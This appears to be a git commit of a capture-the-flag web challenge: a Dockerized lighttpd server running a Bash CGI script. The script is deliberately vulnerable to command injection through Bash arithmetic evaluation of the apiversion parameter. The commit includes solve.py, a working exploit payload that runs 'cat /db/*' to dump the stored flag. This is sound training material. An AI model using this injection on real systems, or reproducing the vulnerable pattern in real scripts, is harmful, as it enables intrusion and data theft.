cscg ist super
This commit is contained in:
20
2026/cscg/web/innovation-at-work/Dockerfile
Normal file
20
2026/cscg/web/innovation-at-work/Dockerfile
Normal file
@@ -0,0 +1,20 @@
|
||||
FROM docker.io/ubuntu:noble-20241118.1@sha256:80dd3c3b9c6cecb9f1667e9290b3bc61b78c2678c02cbdae5f0fea92cc6734ab
|
||||
|
||||
ADD --chmod=0755 --checksum=sha256:4c97fd03a3b181996b1473f3a99b69a1efc6ecaf2b4ede061b6bd60a96b9325a \
|
||||
https://raw.githubusercontent.com/reproducible-containers/repro-sources-list.sh/v0.1.0/repro-sources-list.sh \
|
||||
/usr/local/bin/repro-sources-list.sh
|
||||
|
||||
RUN \
|
||||
--mount=type=cache,target=/var/cache/apt,sharing=locked \
|
||||
--mount=type=cache,target=/var/lib/apt,sharing=locked \
|
||||
/usr/local/bin/repro-sources-list.sh && \
|
||||
apt-get update && \
|
||||
apt-get install -y lighttpd
|
||||
|
||||
COPY www/ /www
|
||||
RUN chmod -R a+rx-w /www
|
||||
RUN mkdir /db
|
||||
|
||||
COPY lighttpd.conf run.sh /
|
||||
|
||||
ENTRYPOINT ["/run.sh"]
|
||||
10
2026/cscg/web/innovation-at-work/docker-compose.yml
Normal file
10
2026/cscg/web/innovation-at-work/docker-compose.yml
Normal file
@@ -0,0 +1,10 @@
|
||||
version: '3'
|
||||
|
||||
services:
|
||||
web:
|
||||
build: .
|
||||
container_name: innovation-at-work-app
|
||||
ports:
|
||||
- "8000:8000"
|
||||
environment:
|
||||
FLAG: dach2026{fake_flag}
|
||||
12
2026/cscg/web/innovation-at-work/lighttpd.conf
Normal file
12
2026/cscg/web/innovation-at-work/lighttpd.conf
Normal file
@@ -0,0 +1,12 @@
|
||||
server.modules = (
|
||||
"mod_cgi",
|
||||
)
|
||||
server.document-root = "/www"
|
||||
server.port = 8000
|
||||
|
||||
user = "www-data"
|
||||
|
||||
cgi.assign = (
|
||||
".cgi" => "/usr/bin/bash"
|
||||
)
|
||||
|
||||
22
2026/cscg/web/innovation-at-work/notes.md
Normal file
22
2026/cscg/web/innovation-at-work/notes.md
Normal file
@@ -0,0 +1,22 @@
|
||||
user object at:
|
||||
/db/13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de:13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de
|
||||
|
||||
Flag is stored at:
|
||||
/db/938c2a3dfa19c1a46821bed04912db62f9fdb134737804213cd67099482dc640:random_password_hash
|
||||
|
||||
Execution: `exec lighttpd -f /lighttpd.conf -D` => use lighttpd.conf and do not deamonize
|
||||
|
||||
|
||||
```
|
||||
server.modules = (
|
||||
"mod_cgi",
|
||||
)
|
||||
server.document-root = "/www"
|
||||
server.port = 8000
|
||||
|
||||
user = "www-data"
|
||||
|
||||
cgi.assign = (
|
||||
".cgi" => "/usr/bin/bash"
|
||||
)
|
||||
```
|
||||
17
2026/cscg/web/innovation-at-work/run.sh
Executable file
17
2026/cscg/web/innovation-at-work/run.sh
Executable file
@@ -0,0 +1,17 @@
|
||||
#!/bin/sh
|
||||
|
||||
example_hash="$(echo example | shasum -a 256 | cut -d' ' -f 1)"
|
||||
echo '{ "name: "Max Mustermann", "age": 10 }' > /db/$example_hash:$example_hash
|
||||
|
||||
|
||||
flag_hash="$(echo flag | shasum -a 256 | cut -d' ' -f 1)"
|
||||
password_hash="$(head -n 32 /dev/random | shasum -a 256 | cut -d' ' -f 1)"
|
||||
echo 'dach2026{fake_flag}' > /db/$flag_hash:$password_hash
|
||||
chmod -R a+rwx /db
|
||||
|
||||
unset example_hash
|
||||
unset password_hash
|
||||
unset flag_hash
|
||||
|
||||
exec lighttpd -f /lighttpd.conf -D
|
||||
|
||||
12
2026/cscg/web/innovation-at-work/solve.py
Normal file
12
2026/cscg/web/innovation-at-work/solve.py
Normal file
@@ -0,0 +1,12 @@
|
||||
import requests
|
||||
|
||||
URL = "https://jgojibkxquhifqyvar6c5c6j6n-8000-innovation-at-work.challenge.cscg.live"
|
||||
|
||||
def fetch_data(s, apiversion: str, name: str, password: str):
|
||||
url = f"{URL}/get.cgi?apiversion={apiversion}&name={name}&password={password}"
|
||||
r = s.get(url)
|
||||
print(f"{r.status_code}: {r.text}")
|
||||
|
||||
with requests.session() as s:
|
||||
payload = "a[$(exec%20>/proc/$$/fd/1;echo;cat%20/db/*)]"
|
||||
fetch_data(s, payload, 'dummy', 'dummy')
|
||||
58
2026/cscg/web/innovation-at-work/www/get.cgi
Executable file
58
2026/cscg/web/innovation-at-work/www/get.cgi
Executable file
@@ -0,0 +1,58 @@
|
||||
#!/bin/bash
|
||||
|
||||
echo "Content-Type: text/plain"
|
||||
|
||||
if [[ "$REQUEST_METHOD" != "GET" ]]; then
|
||||
echo "Status: 405 Method Not Allowed"
|
||||
echo ""
|
||||
exit 0
|
||||
fi
|
||||
|
||||
apiversion=""
|
||||
name=""
|
||||
password=""
|
||||
|
||||
readarray -d '&' -t params < <(printf "%s" "$QUERY_STRING")
|
||||
for kv in "${params[@]}"; do
|
||||
key="${kv%%=*}"
|
||||
value="${kv##*=}"
|
||||
dvalue="$(printf '%b' "${value//%/\\x}")"
|
||||
|
||||
case ${key} in
|
||||
name)
|
||||
name="$dvalue"
|
||||
;;
|
||||
password)
|
||||
password="$dvalue"
|
||||
;;
|
||||
apiversion)
|
||||
apiversion="$dvalue"
|
||||
;;
|
||||
*)
|
||||
echo "Status: 400 Bad Request"
|
||||
echo ""
|
||||
exit 0
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
|
||||
if [[ "${apiversion}" -ne 1 ]]; then
|
||||
echo "Status: 400 Bad Request"
|
||||
echo ""
|
||||
echo "unsupported API version: $apiversion"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
password_hash="$(echo "$password" | shasum -a 256 | cut -d' ' -f1)"
|
||||
name_hash="$(echo "$name" | shasum -a 256 | cut -d' ' -f1)"
|
||||
|
||||
# poor man's database
|
||||
if [[ -f "/db/$name_hash:$password_hash" ]]; then
|
||||
echo ""
|
||||
cat "/db/$name_hash:$password_hash"
|
||||
else
|
||||
echo "Status: 404 Not Found"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
3
2026/cscg/web/innovation-at-work/www/index.html
Normal file
3
2026/cscg/web/innovation-at-work/www/index.html
Normal file
@@ -0,0 +1,3 @@
|
||||
<html>
|
||||
<p>It is working!</p>
|
||||
</html>
|
||||
Reference in New Issue
Block a user